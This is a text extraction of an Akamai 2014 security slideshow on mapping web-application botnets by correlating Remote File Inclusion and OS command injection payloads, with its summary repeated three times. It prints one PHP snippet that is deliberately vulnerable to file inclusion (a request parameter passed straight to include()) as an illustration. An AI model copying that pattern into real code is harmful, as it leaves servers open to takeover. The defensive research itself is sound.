0 evaluări0% au considerat acest document util (0 voturi)
15 vizualizări10 pagini
Using data from the Akamai Intelligent PlatformTM, Akamai has developed a new analysis technique for web application layer botnets. By locating WAF triggers related to both Remote File Inclusion attacks and OS Command Injection attacks, researchers used aggregated results to map multiple botnets operating in the studied time period. Viewing the data in this manner yielded additional insight into the botnets and their respective capabilities. This presentation offers a summary of this technique as excerpted from the State of the Internet Q4 2014 Security Report. Watch this slideshow and then get more details at
http://bit.ly/1GEbAZ9
Using data from the Akamai Intelligent PlatformTM, Akamai has developed a new analysis technique for web application layer botnets. By locating WAF triggers related to both Remote File Inclusion attacks and OS Command Injection attacks, researchers used aggregated results to map multiple botnets operating in the studied time period. Viewing the data in this manner yielded additional insight into the botnets and their respective capabilities. This presentation offers a summary of this technique as excerpted from the State of the Internet Q4 2014 Security Report. Watch this slideshow and then get more details at
http://bit.ly/1GEbAZ9
Using data from the Akamai Intelligent PlatformTM, Akamai has developed a new analysis technique for web application layer botnets. By locating WAF triggers related to both Remote File Inclusion attacks and OS Command Injection attacks, researchers used aggregated results to map multiple botnets operating in the studied time period. Viewing the data in this manner yielded additional insight into the botnets and their respective capabilities. This presentation offers a summary of this technique as excerpted from the State of the Internet Q4 2014 Security Report. Watch this slideshow and then get more details at
http://bit.ly/1GEbAZ9
Intelligent PlatformTM Automate discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS Command Injection attacks Botnets profiled by identifying malicious code resource URLs and seemingly identical payloads Analysis does not require inclusion in the botnet or taking over the botnets command and control (C&C, C2) server [Download the Q4 2014 Global DDoS Attack Report for supporting data and analysis]
2 / [The State of the Internet] / Security (Q4 2014)
= Remote File Inclusion (RFI) attacks
Used to exploit dynamic file include mechanisms
in web applications Web application can be tricked into including remote files with malicious code RFI vulnerabilities are easily found and exploited by attackers $dir = $_GET['module_name']; include($dir . "/function.php"); Figure 1: Code vulnerable to a Remote File Inclusion attack
3 / [The State of the Internet] / Security (Q4 2014)
= OS Command Injection
Used to execute unauthorized operating system
commands The result of mixing trusted code with untrusted data Commands executed by the attacker will run with the same privileges of the commanding component Attackers can leverage this ability to gain access and damage parts that are not reachable
4 / [The State of the Internet] / Security (Q4 2014)
= common payloads in botnets
RFI and OS Command Injection are among the most
prevalent of vulnerabilities reported Attacker can take full control over the victim server The most favorable attack vector
In recent months, Akamai has observed massively
orchestrated attempts to find such vulnerabilities Botnet machines, even geographically disparate machines belonging to different organizations, try to inject the same remote piece of malicious code Code correlations enabled Akamai to map multiple Internet botnets operating at the time of the comparison
5 / [The State of the Internet] / Security (Q4 2014)
= botnet findings
RFI and OS Command Injection botnets targeted more
than 850 web applications across several top-level domains over a seven-day period All of the botnet traffic appeared to originate from compromised servers, most from popular Software-asa-Service (SaaS) and cloud hosting providers The botnet Akamai analyzed included a dedicated Python script that performed web crawling disguised as a Microsoft Bing bot In one instance, an observed botnet propagated through two WordPress TimThumb vulnerabilities
6 / [The State of the Internet] / Security (Q4 2014)
= analysis of botnet capabilities
Both RFI and OS Command Injection attacks used the same
malicious code involving:
Remote shell command execution
Remote file upload (see figure) SMS sending, controlled by IRC commands Local FTP server credentials brute force attack IRC-controlled UDP/TCP denial of service flood
Figure 2: Code for remote file upload
7 / [The State of the Internet] / Security (Q4 2014)
= conclusion
Novel approach to understanding web application-layer
botnets Used attack payload as the common denominator to aggregate data and map botnet information Does not require the researcher to be a part of the botnet or to take over the botnets C2 server Can be used for mapping other types of malicious activities that use a distinct payload
8 / [The State of the Internet] / Security (Q4 2014)
= Q 4 2014 global attack report
Download the Q4 2014 State of the Internet Security Report The Q4 2014 report covers: / Analysis of DDoS attack trends / Breakdown of average Gbps/Mbps statistics / Year-over-year and quarter-by-quarter analysis / Types and frequency of application-layer attacks / Types and frequency of infrastructure attacks / Trends in attack frequency, size and sources / Where and when DDoSers launch attacks / Case study and analysis
9 / [The State of the Internet] / Security (Q4 2014)
= about Prolexic
StateoftheInternet.com, brought to you by Akamai,
serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.
Visitors to www.stateoftheinternet.com can find current and
archived versions of Akamais State of the Internet (Connectivity and Security) reports, the companys data visualizations, and other resources designed to put context around the ever-changing Internet landscape.
10 / [The State of the Internet] / Security (Q4 2014)